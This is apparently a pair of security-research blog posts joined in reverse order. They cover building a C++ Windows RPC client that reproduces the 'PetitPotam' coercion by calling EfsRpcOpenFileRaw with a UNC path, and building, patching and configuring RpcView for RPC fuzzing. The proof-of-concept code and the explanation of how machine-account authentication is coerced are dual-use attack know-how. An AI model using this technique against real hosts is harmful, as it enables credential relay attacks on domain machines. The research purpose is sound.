As I already explained how to install and set up Visual Studio, I won’t go through this step again in this post. Please note that I’m using Visual Studio Community 2019 and the latest version of the Windows 10 SDK is also installed. The versions should not be that important though as we are not doing anything fancy.

Let’s fire up Visual Studio and create a new C++ Console App project.

I will simply name this new project EfsrClient and save it in C:\Workspace.

Visual Studio will automatically create the file EfsrClient.cpp, which contains the main function along with some comments explaining how to compile and build the project. Usually, I get rid of these comments, and I rewrite the main function as follows, just to start with a clean file.

int wmain(int argc, wchar_t* argv[])
{
    
}

The next thing you want to do is go back to RpcView, select the “decompiled” interface definition, copy its content, and save it as a new file in your project. To do so, you can simply right-click on the “Source Files” folder, and then Add > New Item....

In the dialog box, we can select the C++ File (.cpp) template, and enter something like efsr.idl in the Name field. Although the template is not important, the extension of the file must be .idl because it determines which compiler Visual Studio will use for this file. In this case, it will use the MIDL compiler.

Once this is done, you should have a new file called efsr.idl in the “Source Files” folder. Next, we can right-click on our IDL file and compile it. But before doing so, make sure to select the appropriate target architecture: x86 or x64 here. Indeed, the MIDL compiler produces architecture-dependent code, so if you compile the IDL file for the x86 architecture and later decide to compile your application for the x64 architecture, you will most likely get into trouble.

If all goes well, you should see something like this in the Build Output window.

At this point, the MIDL compiler has created 3 files:

File       Type          Intended for        Description
efsr_h.h   Header file   Client and Server   Essentially function and structure definitions, well that’s a header file…
efsr_c.c   Source file   Client              Code for the RPC runtime on client side
efsr_s.c   Source file   Server              Code for the RPC runtime on server side, we don’t need this file

Although these files were created in the solution’s folder, they are not automatically added to the solution itself, so we need to do this manually.

  1. Right-click on the “Header Files” folder, Add > Existing Item... > efsr_h.h > Add.
  2. Right-click on the “Source Files” folder, Add > Existing Item... > efsr_c.c > Add.

Before going any further, we should make sure that both the header and the source files are well formed.

Here we can see that there is a problem with the file efsr_h.h. Some structure definitions were inserted in the middle of two function prototypes.

long Proc1_EfsRpcReadFileRaw_Downlevel(
  [in][context_handle] void* arg_0,
  [out]pipe char* arg_1);

long Proc2_EfsRpcWriteFileRaw_Downlevel(
  [in][context_handle] void* arg_0,
  [in]pipe char* arg_1);

If we check the definition of these two functions in the IDL file, we can see that the keyword pipe was inserted, but the MIDL compiler didn’t handle it properly. For now, we can simply remove this keyword and compile again.

Note: the type identified by RpcView was actually correct but, because of the syntax, the compiler failed to produce the correct output code. In the original IDL file, the type of arg_1 is EFS_EXIM_PIPE*, where EFS_EXIM_PIPE is indeed defined as a pipe unsigned char.

When dealing with IDL files generated by RpcView, this kind of error should be expected, as the “decompilation” process is not supposed to produce a 100% usable result straight out of the box. With time and practice though, you can quickly spot these issues and fix them.

After doing that, the header file looks much better. We no longer have syntax errors in this file.

The thing I usually do next is simply include the header file in the main source code, and compile as is to check if we have any errors.

#include "efsr_h.h"

int wmain(int argc, wchar_t* argv[])
{
    
}

Here we have 3 errors. The files were successfully compiled but the linker was not able to resolve some symbols: NdrClientCall3, MIDL_user_free, and MIDL_user_allocate.

First things first, the functions MIDL_user_allocate and MIDL_user_free are used to allocate and free memory for the RPC stubs. They are documented here and here. When implementing an RPC application, they must be defined somewhere in the application. It sounds more complicated than it really is though. In practice, we just have to add the following code to our main file.

void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR *) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR * p)
{
    free(p);
}

If we try to build the project again, we should see that the errors are now gone, and were replaced by two warnings that we can ignore.

One error remains though: the linker can’t find the NdrClientCall3 function. The NdrClientCall* functions are the cornerstone of the communication between the client and the server as they basically do all the heavy lifting on your behalf. Whenever you call a remote procedure, they serialize your parameters, send your request as a packet to the server, receive the response, deserialize it, and finally return the result.

As an example, here is what the definition of the EfsRpcOpenFileRaw procedure looks like in efsr_c.c. You can see that, on client side, EfsRpcOpenFileRaw basically consists of a “simple” call to NdrClientCall3.

long Proc0_EfsRpcOpenFileRaw_Downlevel( 
    /* [context_handle][out] */ void **arg_1,
    /* [string][in] */ wchar_t *arg_2,
    /* [in] */ long arg_3)
{

    CLIENT_CALL_RETURN _RetVal;

    _RetVal = NdrClientCall3(
                  ( PMIDL_STUBLESS_PROXY_INFO  )&DefaultIfName_ProxyInfo,
                  0,
                  0,
                  arg_1,
                  arg_2,
                  arg_3);
    return ( long  )_RetVal.Simple;
}

Note: I intentionally did not modify the function names generated by RpcView to highlight the fact that they do not matter. In the end, the server just receives an Opnum value, which is a numeric value that identifies the procedure to call internally. In the case of EfsRpcOpenFileRaw, this value would be 0 (second argument of NdrClientCall3).

CLIENT_CALL_RETURN RPC_VAR_ENTRY NdrClientCall3(
  MIDL_STUBLESS_PROXY_INFO *pProxyInfo,
  unsigned long            nProcNum,
  void                     *pReturnValue,
  ...                      
);

Let’s return to our error message. When the linker is not able to resolve a function symbol, it usually means that we have to explicitly specify where it can find it. And by “where”, I mean “in which DLL”. This kind of information can usually be found in the documentation, so let’s check what we can find about the NdrClientCall3 function here.

The documentation tells us that the NdrClientCall3 function is exported by the RpcRT4.dll DLL. Nothing surprising as it’s the DLL that implements the RPC runtime (remember my previous post?). This means that we have to reference the RpcRT4.lib file in our application. To do so, I personally use the following directive rather than modifying the configuration of the project.

#pragma comment(lib, "RpcRT4.lib")

If you followed along, your code should look like this, and you should also be able to build the project.

Writing a PoC

We already went through a lot of steps at this point, and our application still does nothing. So it’s time to see how to invoke a remote procedure. This process usually goes like this.

  1. Call RpcStringBindingCompose to create the string representation of the binding; you can think of it as a URL.
  2. Call RpcBindingFromStringBinding to create the binding handle based on the previous binding string.
  3. Call RpcStringFree to free the binding string as we don’t need it anymore.
  4. Optionally call RpcBindingSetAuthInfo or RpcBindingSetAuthInfoEx to set explicit authentication information on our binding handle.
  5. Use the binding handle to invoke remote procedures.
  6. Call RpcBindingFree to free the binding handle.

In my case, this yields the following stub code:

#include "efsr_h.h"
#include <iostream>

#pragma comment(lib, "RpcRT4.lib")

int wmain(int argc, wchar_t* argv[])
{
    RPC_STATUS status;
    RPC_WSTR StringBinding;
    RPC_BINDING_HANDLE Binding;

    status = RpcStringBindingCompose(
        NULL,                       // Interface's GUID, will be handled by NdrClientCall
        (RPC_WSTR)L"ncacn_np",      // Protocol sequence
        (RPC_WSTR)L"\\\\127.0.0.1", // Network address
        (RPC_WSTR)L"\\pipe\\lsass", // Endpoint
        NULL,                       // No options here
        &StringBinding              // Output string binding
    );

    wprintf(L"[*] RpcStringBindingCompose status code: %d\r\n", status);

    wprintf(L"[*] String binding: %ws\r\n", StringBinding);

    status = RpcBindingFromStringBinding(
        StringBinding,              // Previously created string binding
        &Binding                    // Output binding handle
    );

    wprintf(L"[*] RpcBindingFromStringBinding status code: %d\r\n", status);

    status = RpcStringFree(
        &StringBinding              // Previously created string binding
    );

    wprintf(L"[*] RpcStringFree status code: %d\r\n", status);

    RpcTryExcept
    {
        // Invoke remote procedure here
    }
    RpcExcept(EXCEPTION_EXECUTE_HANDLER);
    {
        wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
    }
    RpcEndExcept

    status = RpcBindingFree(
        &Binding                    // Reference to the opened binding handle
    );

    wprintf(L"[*] RpcBindingFree status code: %d\r\n", status);
}

void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR*) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
    free(p);
}

Note: I would recommend invoking remote procedures inside an RpcTryExcept block because exceptions are quite common in the context of the RPC runtime. Sometimes exceptions simply occur because the syntax of the request is incorrect but, in other cases, servers can also just throw exceptions rather than returning an error code.

We can already compile this code and make sure everything is OK. RPC functions return an RPC_STATUS code. If they execute successfully, they return the value 0, which means RPC_S_OK. If that’s not the case, you can check the documentation here to determine what’s wrong, or you can even write a function to print the corresponding Win32 error message.
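
As a quick illustration, such a helper could be sketched around FormatMessage, which resolves most RPC_STATUS values since they overlap with the standard Win32 error codes (the function name below is arbitrary).

// Hypothetical helper: prints the system error message associated with an RPC_STATUS code
void PrintRpcStatus(LPCWSTR pwszFunction, RPC_STATUS status)
{
    LPWSTR pwszMessage = NULL;

    FormatMessageW(
        FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
        NULL,                   // Use the system message table
        (DWORD)status,          // RPC_STATUS values are (mostly) Win32 error codes
        0,                      // Default language
        (LPWSTR)&pwszMessage,   // Receives a buffer allocated by FormatMessage
        0,
        NULL
    );

    wprintf(L"[*] %ws status code: %d - %ws", pwszFunction, status, pwszMessage ? pwszMessage : L"(unknown)\r\n");

    if (pwszMessage)
        LocalFree(pwszMessage);
}

For instance, PrintRpcStatus(L"RpcBindingFromStringBinding", status) would print both the numeric status code and the associated message.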

C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe
[*] RpcStringBindingCompose status code: 0
[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]
[*] RpcBindingFromStringBinding status code: 0
[*] RpcStringFree status code: 0
[*] RpcBindingFree status code: 0

Now that we have our binding handle, we can try and invoke the EfsRpcOpenFileRaw procedure. But wait… There is a problem with the function’s prototype. It doesn’t take a binding handle as an argument.

If we go back to the definition of the function in the IDL file, we can see that there is indeed an issue. The argument list should start with arg_0, as shown in the next procedure, EfsRpcReadFileRaw. Therefore, something is missing.

long Proc0_EfsRpcOpenFileRaw_Downlevel(
  [out][context_handle] void** arg_1,
  [in][string] wchar_t* arg_2,
  [in]long arg_3);

long Proc1_EfsRpcReadFileRaw_Downlevel(
  [in][context_handle] void* arg_0,
  [out] char* arg_1);

The missing arg_0 argument is precisely the binding handle we need to pass to the RPC runtime. It’s a typical error I’ve encountered numerous times with RpcView. However, I don’t know if it’s a problem with the tool or a misunderstanding on my part.

Another thing that should tip you off is the fact that the EfsRpcOpenFileRaw procedure returns a context handle as an output value ([out][context_handle] void** arg_1). This is a very common thing for RPC servers. They often expose a procedure that takes a binding handle as an input value and yields a context handle that you must use in later RPC calls.

So, let’s fix this and compile the IDL file once again.

long Proc0_EfsRpcOpenFileRaw_Downlevel(
  [in]handle_t arg_0,
  [out][context_handle] void** arg_1,
  [in][string] wchar_t* arg_2,
  [in]long arg_3);

Now, we know that arg_0 is the binding handle. We also know that arg_1 is a reference to the output context handle. Here, we suppose we don’t know the details of the context structure, but that’s not an issue. We can just pass a reference to an arbitrary void* variable. Then, we don’t know what arg_2 and arg_3 are. Since arg_2 is a wchar_t* and the name of the procedure is EfsRpcOpenFileRaw we can assume that arg_2 is supposed to be a file path. The value of arg_3 is yet to be determined. However, we know that it’s a long so we can arbitrarily set it to 0, and see what happens.

RpcTryExcept
{
    // Invoke remote procedure here
    PVOID pContext;
    LPWSTR pwszFilePath;
    long result;

    pwszFilePath = (LPWSTR)LocalAlloc(LPTR, MAX_PATH * sizeof(WCHAR));
    StringCchPrintf(pwszFilePath, MAX_PATH, L"C:\\Workspace\\foo123.txt");

    wprintf(L"[*] Invoking EfsRpcOpenFileRaw with target path: %ws\r\n", pwszFilePath);
    result = Proc0_EfsRpcOpenFileRaw_Downlevel(Binding, &pContext, pwszFilePath, 0);
    wprintf(L"[*] EfsRpcOpenFileRaw status code: %d\r\n", result);

    LocalFree(pwszFilePath);
}
RpcExcept(EXCEPTION_EXECUTE_HANDLER);
{
    wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
}
RpcEndExcept

C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe
[*] RpcStringBindingCompose status code: 0
[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]
[*] RpcBindingFromStringBinding status code: 0
[*] RpcStringFree status code: 0
[*] Invoking EfsRpcOpenFileRaw with target path: C:\Workspace\foo123.txt
[*] EfsRpcOpenFileRaw status code: 5
[*] RpcBindingFree status code: 0

Running this code, EfsRpcOpenFileRaw fails with the standard Win32 error code 5, which means “Access denied”. This kind of error can be very frustrating because you don’t really know what is going wrong. An “Access denied” error can be returned for a large number of reasons (e.g.: insufficient privileges, wrong combination of parameters, etc.).

Normally, you would have to start reversing the target procedure in order to determine why the server returns this error. However, for the sake of conciseness, I will cheat a bit and just check the documentation. In the documentation of EfsRpcOpenFileRaw, you can read that the third parameter is indeed a “FileName”, but more precisely, it’s an “EFSRPC identifier”. And according to this documentation, “EFSRPC identifiers” are supposed to be UNC paths. So, we can change the following line of code and see if this solves the problem.

StringCchPrintf(pwszFilePath, MAX_PATH, L"\\\\127.0.0.1\\C$\\Workspace\\foo123.txt");

After modifying the code, the server now returns the error code 2, which means “File not found”. That’s a good sign.

C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe
[*] RpcStringBindingCompose status code: 0
[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]
[*] RpcBindingFromStringBinding status code: 0
[*] RpcStringFree status code: 0
[*] Invoking EfsRpcOpenFileRaw with target path: \\127.0.0.1\C$\Workspace\foo123.txt
[*] EfsRpcOpenFileRaw status code: 2
[*] RpcBindingFree status code: 0

Identifying an Interesting Behavior

With Process Monitor running in the background, we can see that lsass.exe indeed tried to access the file \\127.0.0.1\C$\Workspace\foo123.txt, which does not exist, hence the “File not found” error.

However, if we check the details of the CreateFile operation, we can see that the RPC server is actually impersonating the client. In other words, we could have simply called CreateFile ourselves and the result would have been the same.

What’s interesting though is what happens before lsass.exe tries to access the target file. Indeed, it opens the named pipe \pipe\srvsvc, this time without impersonating the client. If you saw my post about PrintSpoofer, you know that a similar behavior was observed with the Print Spooler server, which tried to open the named pipe \pipe\spoolss.

Of course, the NT AUTHORITY\SYSTEM account cannot be used for network authentication. So, when invoking this procedure with a remote path on a domain-joined machine, Windows will actually use the machine account to authenticate on the remote server. This explains why “PetitPotam” is able to coerce an arbitrary Windows host to authenticate to another machine.

And here is the final code.

#include "efsr_h.h"
#include <iostream>
#include <strsafe.h>

#pragma comment(lib, "RpcRT4.lib")

int wmain(int argc, wchar_t* argv[])
{
    RPC_STATUS status;
    RPC_WSTR StringBinding;
    RPC_BINDING_HANDLE Binding;

    status = RpcStringBindingCompose(
        NULL,                       // Interface's GUID, will be handled by NdrClientCall
        (RPC_WSTR)L"ncacn_np",      // Protocol sequence
        (RPC_WSTR)L"\\\\127.0.0.1", // Network address
        (RPC_WSTR)L"\\pipe\\lsass", // Endpoint
        NULL,                       // No options here
        &StringBinding              // Output string binding
    );

    wprintf(L"[*] RpcStringBindingCompose status code: %d\r\n", status);

    wprintf(L"[*] String binding: %ws\r\n", StringBinding);

    status = RpcBindingFromStringBinding(
        StringBinding,              // Previously created string binding
        &Binding                    // Output binding handle
    );

    wprintf(L"[*] RpcBindingFromStringBinding status code: %d\r\n", status);

    status = RpcStringFree(
        &StringBinding              // Previously created string binding
    );

    wprintf(L"[*] RpcStringFree status code: %d\r\n", status);

    RpcTryExcept
    {
        // Invoke remote procedure here
        PVOID pContext;
        LPWSTR pwszFilePath;
        long result;

        pwszFilePath = (LPWSTR)LocalAlloc(LPTR, MAX_PATH * sizeof(WCHAR));
        //StringCchPrintf(pwszFilePath, MAX_PATH, L"C:\\Workspace\\foo123.txt");
        StringCchPrintf(pwszFilePath, MAX_PATH, L"\\\\127.0.0.1\\C$\\Workspace\\foo123.txt");

        wprintf(L"[*] Invoking EfsRpcOpenFileRaw with target path: %ws\r\n", pwszFilePath);
        result = Proc0_EfsRpcOpenFileRaw_Downlevel(Binding, &pContext, pwszFilePath, 0);
        wprintf(L"[*] EfsRpcOpenFileRaw status code: %d\r\n", result);

        LocalFree(pwszFilePath);
    }
    RpcExcept(EXCEPTION_EXECUTE_HANDLER)
    {
        wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());
    }
    RpcEndExcept

    status = RpcBindingFree(
        &Binding                    // Reference to the opened binding handle
    );

    wprintf(L"[*] RpcBindingFree status code: %d\r\n", status);
}

void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR*) malloc(cBytes));
}

void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
    free(p);
}

Conclusion

In this blog post, we saw how it was possible to get all the information we need from RpcView to build a lightweight client application in C/C++. In particular, we saw how we could reproduce the “PetitPotam” trick by invoking the EfsRpcOpenFileRaw procedure of the EFSR interface. I tried to include as much detail as I could, but of course, I cannot cover every aspect of Windows RPC in a single post. If you are interested in Windows RPC, @0xcsandker also wrote an excellent blog post about this subject here: Offensive Windows IPC Internals 2: RPC. His posts are always worth a read as they are thorough and aggregate a lot of information.

I also tried to cover some practical issues and errors you often encounter when implementing an RPC client in C/C++. But again, you will have to deal with a lot of other errors when compiling or invoking remote procedures, if you decide to go this route. Thankfully, a lot of Windows RPC interfaces are documented, such as EFSRPC, so that’s a good starting point.

Finally, implementing an RPC client in C/C++ isn’t necessarily the best approach if you are doing some security-oriented research, as this process is rather time-consuming. However, I would still recommend it because it is a good way to learn and have a better understanding of some Windows internals. As an alternative, a more research-oriented approach would consist in using the NtObjectManager module developed by James Forshaw. This module is quite powerful as it allows you to interact with an RPC server in a few lines of PowerShell. As usual, James wrote an excellent article about it here: Calling Local Windows RPC Servers from .NET.

Links & Resources

Fuzzing Windows RPC with RpcView

The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area.

RPC as a Fuzzing Target?

As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX systems in the eighties. This allowed machines to communicate with each other on a network, and it was even “used as the basis for Network File System (NFS)” (source: Wikipedia).

The RPC implementation developed by Microsoft and used on Windows is DCE/RPC, which is short for “Distributed Computing Environment / Remote Procedure Calls” (source: Wikipedia). DCE/RPC is only one of the many IPC (Interprocess Communications) mechanisms used in Windows. For example, it’s used to allow a local process or even a remote client on the network to interact with another process or a service on a local or remote machine.

As you will have understood, the security implications of such a protocol are particularly interesting. Vulnerabilities in an RPC server may have various consequences, ranging from Denial of Service (DoS) to Remote Code Execution (RCE) and including Local Privilege Escalation (LPE). Coupled with the fact that the code of the legacy RPC servers on Windows is often quite old (if we exclude the more recent (D)COM model), this makes it a very interesting target for fuzzing.

How to Fuzz Windows RPC?

To be clear, this post is not about advanced and automated fuzzing. Others, far more talented than me, already discussed this topic. Rather, I want to show how a beginner can get into this kind of research without any knowledge in this field.

Pentesters use Windows RPC every time they work in Windows / Active Directory environments with impacket-based tools, perhaps without always being fully aware of it. The use of Windows RPC was probably made a bit more obvious with tools such as SpoolSample (a.k.a the “Printer Bug”) by @tifkin_ or, more recently, PetitPotam by @topotam77.

If you want to know how these tools work, or if you want to find bugs in Windows RPC by yourself, I think there are two main approaches. The first approach consists in looking for interesting keywords in the documentation and then experimenting by modifying the impacket library or by writing an RPC client in C. As explained by @topotam77 in the episode 0x09 of the French Hack’n Speak podcast, this approach was particularly efficient in the conception of PetitPotam. However, it has some limitations. The main one is that not all RPC interfaces are documented, and even the existing documentation isn’t always complete. Therefore, the second approach consists in enumerating the RPC servers directly on a Windows machine, with a tool such as RpcView.

RpcView

If you are new to Windows RPC analysis, RpcView is probably the best tool to get started. It is able to enumerate all the RPC servers that are running on a machine and it provides all the collected information in a very neat GUI (Graphical User Interface). When you are not yet familiar with a technical and/or abstract concept, being able to visualize things this way is an undeniable benefit.

Note: this screenshot was taken from https://rpcview.org/.

This tool was originally developed by 4 French researchers - Jean-Marie Borello, Julien Boutet, Jeremy Bouetard and Yoanne Girardin (see authors) - in 2017 and is still actively maintained. Its use was highlighted at PacSec 2017 in the presentation A view into ALPC-RPC by Clément Rouault and Thomas Imbert. This presentation also came along with the tool RPCForge.

Downloading and Running RpcView for the First Time

RpcView’s official repository is located here: https://github.com/silverf0x/RpcView. For each commit, a new release is automatically built through AppVeyor. So, you can always download the latest version of RpcView here.

After extracting the 7z archive, you just have to execute RpcView.exe (ideally as an administrator), and you should be ready to go. However, if the version of Windows you are using is too recent, you will probably get an error similar to the one below.

According to the error message, our “runtime version” is not supported, and we are supposed to send our rpcrt4.dll file to the dev team. This message may sound a bit cryptic for a neophyte but there is nothing to worry about, that’s completely fine.

The library rpcrt4.dll, as its name suggests, literally contains the “RPC runtime”. In other words, it contains all the necessary base code that allows an RPC client and an RPC server to communicate with each other.

Now, if we take a look at the README on GitHub, we can see that there is a section entitled How to add a new RPC runtime. It tells us that there are two ways to solve this problem. The first way is to just edit the file RpcInternals.h and add our runtime version. The second way is to reverse rpcrt4.dll in order to define the required structures such as RPC_SERVER. Honestly, the implementation of the RPC runtime doesn’t change that often, so the first option is perfectly fine in our case.

Compiling RpcView

We saw that our RPC runtime is not currently supported, so we will have to update RpcInternals.h with our runtime version and build RpcView from the source. To do so, we will need the following:

  • Visual Studio 2019 (Community)
  • CMake >= 3.13.2
  • Qt5 == 5.15.2

Note: I strongly recommend using a Virtual Machine for this kind of setup. For your information, I also use Chocolatey - the package manager for Windows - to automate the installation of some of the tools (e.g.: Visual Studio, GIT tools).

Installing Visual Studio 2019

You can download Visual Studio 2019 here or install it with Chocolatey.

choco install visualstudio2019community

While you’re at it, you should also install the Windows SDK as you will need it later on. I use the following code in PowerShell to find the latest available version of the SDK.

[string[]]$sdks = (choco search windbg | findstr "windows-sdk")
$sdk_latest = ($sdks | Sort-Object -Descending | Select -First 1).split(" ")[0]

And I install it with Chocolatey. If you want to install it manually, you can also download the web installer here.

choco install $sdk_latest

Once Visual Studio is installed, you have to open the “Visual Studio Installer”.

And install the “Desktop development with C++” toolkit. I hope you have a solid Internet connection and enough disk space… :grimacing:

Installing CMake

Installing CMake is as simple as running the following command with Chocolatey. But, again, you can also download it from the official website and install it manually.

choco install cmake

Note: CMake is also part of Visual Studio “Desktop development with C++”, but I never tried to compile RpcView with this version.

Installing Qt

At the time of writing, the README specifies that the version of Qt used by the project is 5.15.2. I highly recommend using the exact same version, otherwise you will likely get into trouble during the compilation phase.

The question is: how do you find and download Qt 5.15.2? That’s where things get a bit tricky because the process is a bit convoluted. First, you need to register an account here. This will allow you to use their custom web installer. Then, you need to download the installer here.

Once you have started the installer, it will prompt you to log in with your Qt account.

After that, you can leave everything as default. However, at the “Select Components” step, make sure to select Qt 5.15.2 for MSVC 2019 32 & 64 bits only. That’s already 2.37 GB of data to download, but if you select everything, that represents around 60 GB. :open_mouth:

If you are lucky enough, the installer should run flawlessly, but if you are not, you will probably encounter an error similar to the one below. At the time of writing, an issue is currently open on their bug tracker here, but they don’t seem to be in a hurry to fix it.

To solve this problem, I wrote a quick and dirty PowerShell script that downloads all the required files directly from the closest Qt mirror. That’s probably against the terms of use, but hey, what can you do?! I just wanted to get the job done.

If you leave all the values as default, the script will download and extract all the required files for Visual Studio 2019 (32 & 64 bits) in C:\Qt\5.15.2\.

Note: make sure 7-Zip is installed before running this script!

# Update these settings according to your needs but the default values should be just fine.
$DestinationFolder = "C:\Qt"
$QtVersion = "qt5_5152"
$Target = "msvc2019"
$BaseUrl = "https://download.qt.io/online/qtsdkrepository/windows_x86/desktop"
$7zipPath = "C:\Program Files\7-Zip\7z.exe"

# Store all the 7z archives in a Temp folder.
$TempFolder = Join-Path -Path $DestinationFolder -ChildPath "Temp"
$null = [System.IO.Directory]::CreateDirectory($TempFolder)

# Build the URLs for all the required components.
$AllUrls = @("$($BaseUrl)/tools_qtcreator", "$($BaseUrl)/$($QtVersion)_src_doc_examples", "$($BaseUrl)/$($QtVersion)")

# For each URL, retrieve and parse the "Updates.xml" file. This file contains all the information
# we need to download all the required files.
foreach ($Url in $AllUrls) {
    $UpdateXmlUrl = "$($Url)/Updates.xml"
    $UpdateXml = [xml](New-Object Net.WebClient).DownloadString($UpdateXmlUrl)
    foreach ($PackageUpdate in $UpdateXml.GetElementsByTagName("PackageUpdate")) {
        $DownloadableArchives = @()
        if ($PackageUpdate.Name -like "*$($Target)*") {
            $DownloadableArchives += $PackageUpdate.DownloadableArchives.Split(",") | ForEach-Object { $_.Trim() } | Where-Object { -not [string]::IsNullOrEmpty($_) }
        }
        $DownloadableArchives | Sort-Object -Unique | ForEach-Object {
            $Filename = "$($PackageUpdate.Version)$($_)"
            $TempFile = Join-Path -Path $TempFolder -ChildPath $Filename
            $DownloadUrl = "$($Url)/$($PackageUpdate.Name)/$($Filename)"
            if (Test-Path -Path $TempFile) {
                Write-Host "File $($Filename) found in Temp folder!"
            }
            else {
                Write-Host "Downloading $($Filename) ..."
                (New-Object Net.WebClient).DownloadFile($DownloadUrl, $TempFile)
            }
            Write-Host "Extracting file $($Filename) ..."
            &"$($7zipPath)" x -o"$($DestinationFolder)" $TempFile | Out-Null
        }
    }
}

Building RpcView

We should be ready to go. One last piece is missing though: the RPC runtime version. When I first tried to build RpcView from the source files, I was a bit confused and I didn’t really know which version number was expected, but it’s actually very simple (once you know what to look for…).

You just have to open the properties of the file C:\Windows\System32\rpcrt4.dll and get the File Version. In my case, it’s 10.0.19041.1081.

Then, you can download the source code.

git clone https://github.com/silverf0x/RpcView

After that, we have to edit both .\RpcView\RpcCore\RpcCore4_64bits\RpcInternals.h and .\RpcView\RpcCore\RpcCore4_32bits\RpcInternals.h. At the beginning of these files, there is a static array that contains all the supported runtime versions.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
};

We can see that each version number is represented as a long long value, i.e. four 16-bit fields packed into a single 64-bit integer. For example, the version 10.0.19041.1052 translates to:

0xA00004A61041C = 0x000A (10) || 0x0000 (0) || 0x4A61 (19041) || 0x041C (1052)
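
If you prefer to let the machine do this conversion, here is a minimal C sketch (a hypothetical helper, not part of RpcView) that packs the four components of a version number into the expected 64-bit value:

#include <stdio.h>

// Pack "major.minor.build.revision" into four 16-bit fields of a 64-bit value,
// in the format expected by the RPC_CORE_RUNTIME_VERSION array.
unsigned long long PackRuntimeVersion(unsigned short major, unsigned short minor, unsigned short build, unsigned short revision)
{
    return ((unsigned long long)major << 48)
         | ((unsigned long long)minor << 32)
         | ((unsigned long long)build << 16)
         |  (unsigned long long)revision;
}

int main(void)
{
    // 10.0.19041.1081 -> 0xA00004A610439LL
    printf("0x%llXLL\n", PackRuntimeVersion(10, 0, 19041, 1081));
    return 0;
}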

If we apply the same conversion to the version number 10.0.19041.1081, we get the following result.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL,  //6.3.9431.0000
    0x6000325804000LL,  //6.3.9600.16384
    ...
    0xA00004A6102EALL,  //10.0.19041.746
    0xA00004A61041CLL,  //10.0.19041.1052
    0xA00004A610439LL,  //10.0.19041.1081
};

Finally, we can generate the Visual Studio solution and build it. I will show only the 64-bit compilation process, but if you want to compile the 32-bit version, you can refer to the documentation. The process is very similar anyway.

For the next commands, I assume the following:

  • Qt is installed in C:\Qt\5.15.2\.
  • CMake is installed in C:\Program Files\CMake\.
  • The current working directory is RpcView’s source folder (e.g.: C:\Users\lab-user\Downloads\RpcView\).

mkdir Build\x64
cd Build\x64
set CMAKE_PREFIX_PATH=C:\Qt\5.15.2\msvc2019_64\
"C:\Program Files\CMake\bin\cmake.exe" ../../ -A x64
"C:\Program Files\CMake\bin\cmake.exe" --build . --config Release

Finally, you can download the latest release from AppVeyor here, extract the files, and replace RpcCore4_64bits.dll and RpcCore4_32bits.dll with the versions that were compiled and copied to .\RpcView\Build\x64\bin\Release\.

If all went well, RpcView should finally be up and running! :tada:

Patching RpcView

If you followed along, you probably noticed that, in the end, we did all that just to add a numeric value to two DLLs. Of course, there is a more straightforward way to get the same result. We can just patch the existing DLLs and replace one of the existing values with our own runtime version.

To do so, I will open the two DLLs with HxD. We know that the value 0xA00004A61041C is present in both files, so we can try to locate it within the binary data. Values are stored using the little-endian byte ordering though, so we actually have to search for the hexadecimal pattern 1C04614A00000A00.

Here, we just have to replace the value 1C04 (0x041C = 1052) with 3904 (0x0439 = 1081) because the rest of the version number is the same (10.0.19041).

After saving the two files, RpcView should be up and running. That’s a dirty hack, but it works and it’s way more effective than building the project from the source! :roll_eyes:

Update: Using the “Force” Flag

As it turns out, you don’t even need to go through all this trouble. RpcView has an undocumented /force command line flag that you can use to override the RPC runtime version check.

.\RpcView64\RpcView.exe /force

Honestly, I did not look at the code at all. Otherwise I would have probably seen this. Lesson learned. Thanks @Cr0Eax for bringing this to my attention (source: Twitter). Anyway, building it and patching it was a nice challenge I guess. :sweat_smile:

Initial Configuration

Now that RpcView is up and running, we need to tweak it a little bit in order to make it really usable.

The Refresh Rate

The first thing you want to do is lower the refresh rate, especially if you are running it inside a Virtual Machine. Setting it to 10 seconds is perfectly fine. You could even set this parameter to “manual”.

Symbols

On the screenshot below, we can see that there is a section which is supposed to list all the procedures or functions that are exposed through an RPC server, but it actually only contains addresses.

This isn’t very convenient, but there is a cool thing about most Windows binaries: Microsoft publishes their associated PDB (Program DataBase) files.

PDB is a proprietary file format (developed by Microsoft) for storing debugging information about a program (or, commonly, program modules such as a DLL or EXE) - source: Wikipedia

These symbols can be configured through the Options > Configure Symbols menu item. Here, I set it to srv*C:\SYMBOLS.

The only caveat is that RpcView is not able, unlike other tools, to download the PDB files automatically. So, we need to download them beforehand.

If you have downloaded the Windows 10 SDK, this step should be quite easy though. The SDK includes a tool called symchk.exe which allows you to fetch the PDB files for almost any EXE or DLL, directly from Microsoft’s servers. For example, the following command allows you to download the symbols for all the DLLs in C:\Windows\System32\.

cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"
symchk /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll

